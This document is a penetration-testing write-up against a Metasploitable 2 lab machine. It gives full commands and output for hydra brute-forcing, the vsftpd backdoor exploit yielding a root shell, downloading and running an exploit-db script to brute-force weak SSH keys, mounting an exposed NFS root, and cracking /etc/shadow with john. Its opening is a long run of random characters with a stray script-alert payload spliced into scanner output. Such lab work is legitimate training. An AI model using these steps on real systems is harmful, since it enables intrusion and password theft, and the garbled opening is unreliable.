l31HZGWhm4Id8NXpUpr7vnYBOal1sZED6VRtc9JFtN5ARJhrWrM9xy0OOWtANo3C36DdbQMcSvoYYhg10AyTt1FILdRLYu2dzqN8quEZdlu2VMQBgbaDlVY35sKZ2a7JodzXT41MRWACqQrfGCKT2pAbzV4kvWfzkaD5oWMwJJrADZ82HB1rSFyiecio5g2Ehzk5Bnx0kg3mjk75zUNMoNJ6QQ0mjlORThuVvm7gKQhbh9uXxbyQqZqrnIMO40XVuXWByMrRX7X2YCkGEeE4ttH6jqJD6QcfF1Gs2TpYV58ca688klMIm0UEJoqDjt1lg2tQre9x9RIyNTA1CdRubWQwlcqk795bMDmFTBjWW03saqsfgGdtxKd2hk9pxsN3mTz5rMHYaFgqWUdRldko0rDJLjzopgLlaqe7KbTdN3glHsrqQjI8YaYCGnWTgRFVeIxxm8kGJYxzkB1UGnnAHLgHSdybokKrSeHvqcgZyANpOsn3LGyLHAWutxxjw7L9rPpy8dhGD99zX06frRSiodCMNAsrHPJDFV4qrfAb39j0ydUP1mR50o7lsvhUO8U9oVr3zeUOQklOliV0GuQqQVhVYBYog2KRQpcwQEdr83ejAEd2mnciLORarxmKhbXCjBMcgOYgCDegh8Kgcx53Yi4SZoN9vBAGlCeJmdccU4Zu5Rv8Svqj87v94y4I6jiXn1mlSsck7xheRl8hnMjfFNxQCH4r5zteZZKTHkV6swHfRlGwU3P4s15W4qCPhQFRhZ9fAi8q2xWuHKSS5MfYJ2Wg8XcvxtUtb1Uxai7EDyXuKtsCdMu9ogm5CDSMt8caPdwwLXboE2Hztd592udpkTkYOoTasNXFGbdYsUW8aDUmbfq9l2WInz0K33EHeGGZWHVg0OZW1xfsE5wne2Ssj9VtNzmmKCx6D17DSgBH3mDm9eDJdeVBeHeEO5Zdup84SBU3k<script>alert(foo)</script>: Output from the phpinfo() function was found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpMyAdmin/: phpMyAdmin directory found
+ OSVDB-3092: /phpMyAdmin/Documentation.html: phpMyAdmin is for managing MySQL databases, and should be protected or limited to authorized hosts.
+ 8311 requests: 0 error(s) and 29 item(s) reported on remote host
+ End Time:           2018-07-28 18:02:01 (GMT-4) (42 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

We iddentify a number of sites and items of interest off the automated scan. Visiting the site on port 80 using curl, we can see a link called DVWA to http://10.10.10.101/dvwa/login.php

Port 80 - Damn Vulnerable Web Application

The password hint is provided on the landing page as username admin and password password. We login using these credential using a standard web browser, the first vulnerability is at http://10.10.10.101/dvwa/vulnerabilities/brute/

Brute Force

We can use hydra to attempt to brute force the login, but first we need to get an error message that hydra will scan for to identify unsuccessful attempt. If we just click on the Login button we get Username and/or password incorrect. as the error message. The options used below wait (-w) 60 seconds for the page to respond, and waits (-t) 5 seconds between requests, uses password spraying or reverse brute force (-u), exit on the first match found (-f).

$hydra -l admin -P passwords.lst 10.10.10.101 http-get-form "/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect." -w 60 -t 5 -u -f 
Hydra v8.8 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2019-03-27 11:27:14
[DATA] max 5 tasks per 1 server, overall 5 tasks, 8 login tries (l:1/p:8), ~2 tries per task
[DATA] attacking http-get-form://10.10.10.101:80/dvwa/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.
[80][http-get-form] host: 10.10.10.101   login: admin   password: password
[STATUS] attack finished for 10.10.10.101 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2019-03-27 11:27:15

Command Execution

Entering the loop back address (127.0.0.1) seems to produce output from the ping command. The view source button at the bottom of the page reveals the source code.

<?php

if( isset( $_POST[ 'submit' ] ) ) {

    $target = $_REQUEST["ip"];
    
    $target = stripslashes( $target );
    
    
    // Split the IP into 4 octects
    $octet = explode(".", $target);
    
    // Check IF each octet is an integer
    if ((is_numeric($octet[0])) && (is_numeric($octet[1])) && (is_numeric($octet[2])) && (is_numeric($octet[3])) && (sizeof($octet) == 4)  ) {
    
    // If all 4 octets are int's put the IP back together.
    $target = $octet[0].'.'.$octet[1].'.'.$octet[2].'.'.$octet[3];
    
    
        // Determine OS and execute the ping command.
        if (stristr(php_uname('s'), 'Windows NT')) { 
    
            $cmd = shell_exec( 'ping  ' . $target );
            echo '<pre>'.$cmd.'</pre>';
        
        } else { 
    
            $cmd = shell_exec( 'ping  -c 3 ' . $target );
            echo '<pre>'.$cmd.'</pre>';
        
        }
    
    }
    
    else {
        echo '<pre>ERROR: You have entered an invalid IP</pre>';
    }
    
    
}

?> 

We can append & and the next command we want to execute, however, according to the source code, the $target variable is split into 4 octets and each one evaluated to see if it is numeric, so we need to encode our command in such a way such that it passes the is_numeric test. We check the PHP function at https://www.php.net/manual/en/function.is-numeric.php in an attempt to understand it a bit better. Thought there might be a clue in the fact that since version 7 of PHP hexadecimal values are not is_numeric! After a couple of days of trying various injection to converst commands to numeric strings I gave up and looked at the source at https://github.com/ethicalhack3r/DVWA/tree/master/vulnerabilities/exec/source Looking that the different versions and the help file, the impossible.php is probably not exploitable.

CSRF

Port 111 et al.

RPCBind runs on both TCP and UDP ports 111, so ran a separate nmap scan against the port, since RPC bind glues the processes against the ports, we can use it to identify the processes.

root@kali:~# nmap -A -sT -sU -p 111 10.10.10.101
Starting Nmap 7.70 ( https://nmap.org ) at 2018-07-28 18:25 EDT
Nmap scan report for 10.10.10.101
Host is up (0.00098s latency).

PORT    STATE SERVICE VERSION
111/tcp open  rpcbind 2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      34832/udp  mountd
|   100005  1,2,3      47474/tcp  mountd
|   100021  1,3,4      42100/udp  nlockmgr
|   100021  1,3,4      51622/tcp  nlockmgr
|   100024  1          34009/tcp  status
|_  100024  1          45223/udp  status
111/udp open  rpcbind 2 (RPC #100000)
| rpcinfo: 
|   program version   port/proto  service
|   100000  2            111/tcp  rpcbind
|   100000  2            111/udp  rpcbind
|   100003  2,3,4       2049/tcp  nfs
|   100003  2,3,4       2049/udp  nfs
|   100005  1,2,3      34832/udp  mountd
|   100005  1,2,3      47474/tcp  mountd
|   100021  1,3,4      42100/udp  nlockmgr
|   100021  1,3,4      51622/tcp  nlockmgr
|   100024  1          34009/tcp  status
|_  100024  1          45223/udp  status
MAC Address: 00:0C:29:FA:DD:2A (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.98 ms 10.10.10.101

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.24 seconds

Port 2049

For some reason the showmount commnand is missing from Kali, and whilst looking for is using dpks -S showmount, I located an nmap script for showing exported mount points. I executed the script against port 111.

root@kali:~# nmap --script /usr/share/nmap/scripts/nfs-showmount.nse -p 111 -n -v 10.10.10.101
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-05 15:00 AEST
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 15:00
Completed NSE at 15:00, 0.00s elapsed
Initiating ARP Ping Scan at 15:00
Scanning 10.10.10.101 [1 port]
Completed ARP Ping Scan at 15:00, 0.04s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 15:00
Scanning 10.10.10.101 [1 port]
Discovered open port 111/tcp on 10.10.10.101
Completed SYN Stealth Scan at 15:00, 0.03s elapsed (1 total ports)
NSE: Script scanning 10.10.10.101.
Initiating NSE at 15:00
Completed NSE at 15:00, 0.03s elapsed
Nmap scan report for 10.10.10.101
Host is up (0.00046s latency).

PORT    STATE SERVICE
111/tcp open  rpcbind
| nfs-showmount: 
|_  / *
MAC Address: 00:0C:29:FA:DD:2A (VMware)

NSE: Script Post-scanning.
Initiating NSE at 15:00
Completed NSE at 15:00, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.92 seconds
           Raw packets sent: 2 (72B) | Rcvd: 2 (72B)
root@kali:~# 

It appears that the root directory (/) is exported to all hosts (*).

Port 139 and 445

The initial port scan indicated that Samba was running on the target host and port 139 and 445 were open. We can attempt to connect to the host and list shares

root@kali:~# smbclient -L 10.10.10.101
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\root's password: 
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	tmp             Disk      oh noes!
	opt             Disk      
	IPC$            IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
	ADMIN$          IPC       IPC Service (metasploitable server (Samba 3.0.20-Debian))
Reconnecting with SMB1 for workgroup listing.
Anonymous login successful

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	WORKGROUP            METASPLOITABLE
root@kali:~# 

Port 512-514

Unix r-services are common to commercial platforms, including Solaris, HP-UX, and AIX, but fortunately also available on the Metasploitable target machine. Each r-service runs using standard PAM username and password authentication, which is overridden by ~/.rhosts and /etc/hosts.equiv entries defining trusted hosts and usernames. From a Unix-based platform, you use rsh, rlogin, and rexec clients to access the respective r-services running on a remote host. (Refer: http://etutorials.org/Networking/network+security+assessment/Chapter+7.+Assessing+Remote+Maintenance+Services/7.4+R-Services/) Since we have a list of metasploitable names we can try using them to see if we have any misconfigured.

Searched the web for exploits against rshd. Although https://www.rapid7.com/db/modules/auxiliary/scanner/rservices/rsh_login was very popular, the scanner did not yield any successful results.

Port 1099

Appears to be Java RMI server. RMI allows instances of Java classes (objects) in one JVM to invoke methods for objects in another JVM. RMI also allows classes to be loaded from remote sources and instantiated within the JVM.

root@kali:~# nmap -n -vv -p 1099 -A 10.10.10.101
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-06 19:53 AEST
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
Initiating ARP Ping Scan at 19:53
Scanning 10.10.10.101 [1 port]
Completed ARP Ping Scan at 19:53, 0.04s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 19:53
Scanning 10.10.10.101 [1 port]
Discovered open port 1099/tcp on 10.10.10.101
Completed SYN Stealth Scan at 19:53, 0.03s elapsed (1 total ports)
Initiating Service scan at 19:53
Scanning 1 service on 10.10.10.101
Completed Service scan at 19:53, 6.01s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against 10.10.10.101
NSE: Script scanning 10.10.10.101.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.05s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
Nmap scan report for 10.10.10.101
Host is up, received arp-response (0.00064s latency).
Scanned at 2018-08-06 19:53:25 AEST for 7s

PORT     STATE SERVICE  REASON         VERSION
1099/tcp open  java-rmi syn-ack ttl 64 Java RMI Registry
MAC Address: 00:0C:29:FA:DD:2A (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=8/6%OT=1099%CT=%CU=31796%PV=Y%DS=1%DC=D%G=N%M=000C29%T
OS:M=5B681A9C%P=x86_64-pc-linux-gnu)SEQ(SP=CD%GCD=1%ISR=D5%TI=Z%CI=Z%II=I%T
OS:S=7)OPS(O1=M5B4ST11NW5%O2=M5B4ST11NW5%O3=M5B4NNT11NW5%O4=M5B4ST11NW5%O5=
OS:M5B4ST11NW5%O6=M5B4ST11)WIN(W1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=1
OS:6A0)ECN(R=Y%DF=Y%T=40%W=16D0%O=M5B4NNSNW5%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A
OS:=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=16A0%S=O%A=S+%F=AS%O=M5B4ST11
OS:NW5%RD=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40
OS:%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q
OS:=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164
OS:%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Uptime guess: 1.976 days (since Sat Aug  4 20:27:59 2018)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=205 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Host: localhost

TRACEROUTE
HOP RTT     ADDRESS
1   0.64 ms 10.10.10.101

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 19:53
Completed NSE at 19:53, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.20 seconds
           Raw packets sent: 21 (1.670KB) | Rcvd: 18 (1.434KB)
root@kali:~# 

We can try and find Java RMI relate modules in Metasploit and run them, enumerate user

msf > search java_rmi

Matching Modules
================

   Name                                            Disclosure Date  Rank       Description
   ----                                            ---------------  ----       -----------
   auxiliary/gather/java_rmi_registry                               normal     Java RMI Registry Interfaces Enumeration
   auxiliary/scanner/misc/java_rmi_server          2011-10-15       normal     Java RMI Server Insecure Endpoint Code Execution Scanner
   exploit/multi/browser/java_rmi_connection_impl  2010-03-31       excellent  Java RMIConnectionImpl Deserialization Privilege Escalation
   exploit/multi/misc/java_rmi_server              2011-10-15       excellent  Java RMI Server Insecure Default Configuration Java Code Execution


msf > use auxiliary/gather/java_rmi_registry
msf auxiliary(gather/java_rmi_registry) > show options

Module options (auxiliary/gather/java_rmi_registry):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  1099             yes       The target port (TCP)

msf auxiliary(gather/java_rmi_registry) > set RHOST 10.10.10.101
RHOST => 10.10.10.101
msf auxiliary(gather/java_rmi_registry) > run

[*] 10.10.10.101:1099 - Sending RMI Header...
[*] 10.10.10.101:1099 - Listing names in the Registry...
[-] 10.10.10.101:1099 - Names not found in the Registry
[*] Auxiliary module execution completed
msf auxiliary(gather/java_rmi_registry) > back
msf > set RHOST 10.10.10.101
RHOST => 10.10.10.101
msf > use auxiliary/scanner/misc/java_rmi_server
msf auxiliary(scanner/misc/java_rmi_server) > show options

Module options (auxiliary/scanner/misc/java_rmi_server):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target address range or CIDR identifier
   RPORT    1099             yes       The target port (TCP)
   THREADS  1                yes       The number of concurrent threads

msf auxiliary(scanner/misc/java_rmi_server) > set RHOSTS 10.10.10.101
RHOSTS => 10.10.10.101
msf auxiliary(scanner/misc/java_rmi_server) > set THREADS 32
THREADS => 32
msf auxiliary(scanner/misc/java_rmi_server) > run

[+] 10.10.10.101:1099     - 10.10.10.101:1099 Java RMI Endpoint Detected: Class Loader Enabled
[*] 10.10.10.101:1099     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/misc/java_rmi_server) > 

Port 1524

According to nmap this is a bindshell for Metasploit. Could not find any vulnerabilities associated with this, but literature on the web suggests that a simple telnet to the port is sufficient to gain root access on the target.

Port 2121

We identify ProFTP running on the target and listening on port 2121.

root@kali:~# nmap -A -sV -p2121 10.10.10.101
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-06 23:12 AEST
Nmap scan report for 10.10.10.101
Host is up (0.00068s latency).

PORT     STATE SERVICE VERSION
2121/tcp open  ftp     ProFTPD 1.3.1
MAC Address: 00:0C:29:FA:DD:2A (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop
Service Info: OS: Unix

TRACEROUTE
HOP RTT     ADDRESS
1   0.68 ms 10.10.10.101

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3.37 seconds

Searching the web for ProFTP vulnerabilities, we can find https://www.cvedetails.com/vulnerability-list/vendor_id-9520/product_id-16873/version_id-72426/Proftpd-Proftpd-1.3.1.html. We search for any potential exploits within metasploit again proftp, and come up with this.

msf > search proftp

Matching Modules
================

   Name                                         Disclosure Date  Rank       Description
   ----                                         ---------------  ----       -----------
   exploit/freebsd/ftp/proftp_telnet_iac        2010-11-01       great      ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
   exploit/linux/ftp/proftp_sreplace            2006-11-26       great      ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)
   exploit/linux/ftp/proftp_telnet_iac          2010-11-01       great      ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)
   exploit/linux/misc/netsupport_manager_agent  2011-01-08       average    NetSupport Manager Agent Remote Buffer Overflow
   exploit/unix/ftp/proftpd_133c_backdoor       2010-12-02       excellent  ProFTPD-1.3.3c Backdoor Command Execution
   exploit/unix/ftp/proftpd_modcopy_exec        2015-04-22       excellent  ProFTPD 1.3.5 Mod_Copy Command Execution
   exploit/windows/ftp/proftp_banner            2009-08-25       normal     ProFTP 2.9 Banner Remote Buffer Overflow

I cannot find anything specific to version 1.3.1, so this may be a candidate for a brute force attempt using our username and cracked passwords list.

Port 3306

Port 3306 is usually used by MySQL. We can confirm this using nmap

root@kali:~# nmap -p 3306 -A 10.10.10.101 
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-07 02:03 AEST
Nmap scan report for 10.10.10.101
Host is up (0.00098s latency).

PORT     STATE SERVICE VERSION
3306/tcp open  mysql   MySQL 5.0.51a-3ubuntu5
| mysql-info: 
|   Protocol: 10
|   Version: 5.0.51a-3ubuntu5
|   Thread ID: 10
|   Capabilities flags: 43564
|   Some Capabilities: SupportsCompression, Support41Auth, Speaks41ProtocolNew, LongColumnFlag, SwitchToSSLAfterHandshake, ConnectWithDatabase, SupportsTransactions
|   Status: Autocommit
|_  Salt: C3tqYMR4K^w^NNz?it*n
MAC Address: 00:0C:29:FA:DD:2A (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.33
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.98 ms 10.10.10.101

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 3.29 seconds
root@kali:~# 

A search for vulnerabilities in this version of MySQL we can find https://www.cvedetails.com/vulnerability-list/vendor_id-185/product_id-316/version_id-61896/Mysql-Mysql-5.0.51a.html, as well as https://www.exploit-db.com/exploits/19092/

Port 3632

Port 5432

Port 5900

Port 6000

Port 6667

Port 6697

Port 8009

Port 8180

Port 8787

Port 34009

Port 35709

Port 47474

Port 51622

Exploitation

The exploitation of the services using the Metasploit framework is summarised below.

Port 21

msf > use exploit/unix/ftp/vsftpd_234_backdoor
msf exploit(unix/ftp/vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST                   yes       The target address
   RPORT  21               yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(unix/ftp/vsftpd_234_backdoor) > set RHOST 10.10.10.101
RHOST => 10.10.10.101
msf exploit(unix/ftp/vsftpd_234_backdoor) > show options

Module options (exploit/unix/ftp/vsftpd_234_backdoor):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   RHOST  10.10.10.101     yes       The target address
   RPORT  21               yes       The target port (TCP)


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(unix/ftp/vsftpd_234_backdoor) > exploit

[*] 10.10.10.101:21 - Banner: 220 (vsFTPd 2.3.4)
[*] 10.10.10.101:21 - USER: 331 Please specify the password.
[+] 10.10.10.101:21 - Backdoor service has been spawned, handling...
[+] 10.10.10.101:21 - UID: uid=0(root) gid=0(root)
[*] Found shell.
[*] Command shell session 1 opened (10.10.10.100:45063 -> 10.10.10.101:6200) at 2018-07-27 12:24:57 -0400

id
uid=0(root) gid=0(root)
hostname
metasploitable

Port 22

Attempted to check if SSH was vulnerable to using a known blacklisted key pair.

root@kali:~/metasploitable2/5662# wget https://www.exploit-db.com/download/5720.py -O 5720.py 
--2018-07-28 16:18:23--  https://www.exploit-db.com/download/5720.py
Resolving www.exploit-db.com (www.exploit-db.com)... 192.124.249.8
Connecting to www.exploit-db.com (www.exploit-db.com)|192.124.249.8|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 4353 (4.3K) [application/txt]
Saving to: �5720.py�

5720.py                          100%[=======================================================>]   4.25K  --.-KB/s    in 0s      

2018-07-28 16:18:24 (38.4 MB/s) - �5720.py� saved [4353/4353]

root@kali:~/metasploitable2/5662#
root@kali:~/metasploitable2/5622# wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/5622.tar.bz2 -O 5622.tar.bz2
--2018-07-28 16:19:43--  https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/5622.tar.bz2
Resolving github.com (github.com)... 192.30.255.112, 192.30.255.113
Connecting to github.com (github.com)|192.30.255.112|:443... connected.
HTTP request sent, awaiting response... 302 Found
Location: https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/bin-sploits/5622.tar.bz2 [following]
--2018-07-28 16:19:44--  https://raw.githubusercontent.com/offensive-security/exploit-database-bin-sploits/master/bin-sploits/5622.tar.bz2
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.96.133
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.96.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 50226987 (48M) [application/octet-stream]
Saving to: �5622.tar.bz2�

5622.tar.bz2                     100%[=======================================================>]  47.90M  2.16MB/s    in 22s     

2018-07-28 16:20:25 (2.17 MB/s) - �5622.tar.bz2� saved [50226987/50226987]

root@kali:~/metasploitable2/5622# bunzip2 5622.tar.bz2 
root@kali:~/metasploitable2/5622# tar xvf 5622.tar 
rsa/
rsa/2048/
rsa/2048/2712a6d5cec99f295a0c468b830a370d-28940.pub
rsa/2048/eaddc9bba9bf3c0832f443706903cd14-28712.pub
<snip>
root@kali:~/metasploitable2/5622# python 5720.py rsa/2048/ 10.10.10.101 root 22 20

-OpenSSL Debian exploit- by ||WarCat team|| warcat.no-ip.org
Tested 110 keys | Remaining 32658 keys | Aprox. Speed 22/sec
Tested 224 keys | Remaining 32544 keys | Aprox. Speed 22/sec
Tested 337 keys | Remaining 32431 keys | Aprox. Speed 22/sec
<snip>
Tested 9330 keys | Remaining 23438 keys | Aprox. Speed 29/sec
Tested 9445 keys | Remaining 23323 keys | Aprox. Speed 23/sec
Tested 9556 keys | Remaining 23212 keys | Aprox. Speed 22/sec

Key Found in file: 57c3115d77c56390332dc5c49978627a-5429
Execute: ssh -lroot -p22 -i rsa/2048//57c3115d77c56390332dc5c49978627a-5429 10.10.10.101

Tested 9618 keys | Remaining 23150 keys | Aprox. Speed 12/sec
root@kali:~/metasploitable2/5622#
root@kali:~/metasploitable2/5622# ssh -lroot -p22 -i rsa/2048//57c3115d77c56390332dc5c49978627a-5429 10.10.10.101
Last login: Fri Jul 27 07:38:09 2018 from :0.0
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:
http://help.ubuntu.com/
You have new mail.
root@metasploitable:~# hostname
metasploitable
root@metasploitable:~# id
uid=0(root) gid=0(root) groups=0(root)
root@metasploitable:~#

Port 23

msf > use auxiliary/scanner/telnet/telnet_version
msf auxiliary(scanner/telnet/telnet_version) > show options

Module options (auxiliary/scanner/telnet/telnet_version):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   PASSWORD                   no        The password for the specified username
   RHOSTS    10.10.10.101/32  yes       The target address range or CIDR identifier
   RPORT     23               yes       The target port (TCP)
   THREADS   1                yes       The number of concurrent threads
   TIMEOUT   30               yes       Timeout for the Telnet probe
   USERNAME                   no        The username to authenticate as

msf auxiliary(scanner/telnet/telnet_version) > run

[+] 10.10.10.101:23       - 10.10.10.101:23 TELNET _                  _       _ _        _     _      ____  \x0a _ __ ___   ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \ \x0a| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) |\x0a| | | | | |  __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | |  __// __/ \x0a|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|\x0a                            |_|                                          \x0a\x0a\x0aWarning: Never expose this VM to an untrusted network!\x0a\x0aContact: msfdev[at]metasploit.com\x0a\x0aLogin with msfadmin/msfadmin to get started\x0a\x0a\x0ametasploitable login:
[*] 10.10.10.101:23       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/telnet/telnet_version) > creds add user:msfadmin password:msfadmin
msf auxiliary(scanner/telnet/telnet_version) > creds
Credentials
===========

host  origin  service  public    private   realm  private_type
----  ------  -------  ------    -------   -----  ------------
                       msfadmin  msfadmin         Password

msf auxiliary(scanner/telnet/telnet_version) >

Grabbing the banner for the Telnet service we are given out login hints msfadmin and msfadmin. We add these credentials to the Metasploit creds

We can also create a usernames (/root/msfusers.txt) and passwords (/root/msfpasswords.txt) file containing these credentials for testing brute force attempts.

Port 25

We can use metasploit to attempt to enumerate some of the users, and add the identified account to our users file

msf > use auxiliary/scanner/smtp/smtp_enum
msf auxiliary(scanner/smtp/smtp_enum) > show options

Module options (auxiliary/scanner/smtp/smtp_enum):

   Name       Current Setting                                                Required  Description
   ----       ---------------                                                --------  -----------
   RHOSTS     10.10.10.101/32                                                yes       The target address range or CIDR identifier
   RPORT      25                                                             yes       The target port (TCP)
   THREADS    256                                                            yes       The number of concurrent threads
   UNIXONLY   true                                                           yes       Skip Microsoft bannered servers when testing unix users
   USER_FILE  /usr/share/metasploit-framework/data/wordlists/unix_users.txt  yes       The file that contains a list of probable users accounts.

msf auxiliary(scanner/smtp/smtp_enum) > run

[*] 10.10.10.101:25       - 10.10.10.101:25 Banner: 220 metasploitable.localdomain ESMTP Postfix (Ubuntu)
[+] 10.10.10.101:25       - 10.10.10.101:25 Users found: , backup, bin, daemon, distccd, ftp, games, gnats, irc, libuuid, list, lp, mail, man, news, nobody, postgres, postmaster, proxy, service, sshd, sync, sys, syslog, user, uucp, www-data
[*] 10.10.10.101:25       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(scanner/smtp/smtp_enum) >

We have enumerated some of the common unix users available on the host, we can create a list of username to be used for future scans and exploit attempts. We also have the initial password. We maintain the users list in a file called msfusers.txt for future use.

Port 111 et al.

To get the showmount command on kali, you need to run apt-get install nfs-common with elevated privileges. Since the root directory (/) is exported to all hosts (*), we can attempt to mount the file system remotely. mount -t nfs 10.10.10.101:/ /mnt. We essentially have root access to the file system, and can make whatever changes required, including uploading new SSH keys to be able to SSH onto the servers. Since we can read file, we can take a look at sensitive files such as configuration files, including/etc/passwd and /etc/shadow and attempting to cracking the passwords.

root@kali:~# unshadow passwd shadow > unshadowed
root@kali:~# john -wordlist:/usr/share/metasploit-framework/data/wordlists/password.lst unshadowed 
Warning: detected hash type "md5crypt", but the string is also recognized as "aix-smd5"
Use the "--format=aix-smd5" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 7 password hashes with 7 different salts (md5crypt, crypt(3) $1$ [MD5 128/128 AVX 4x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
123456789        (klog)
batman           (sys)
service          (service)
user             (user)
4g 0:00:00:24 DONE (2018-08-08 22:35) 0.1622g/s 3577p/s 17206c/s 17206C/s ?tude..vagrant
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@kali:~# john unshadowed 
Warning: detected hash type "md5crypt", but the string is also recognized as "aix-smd5"
Use the "--format=aix-smd5" option to force loading these as that type instead
Using default input encoding: UTF-8
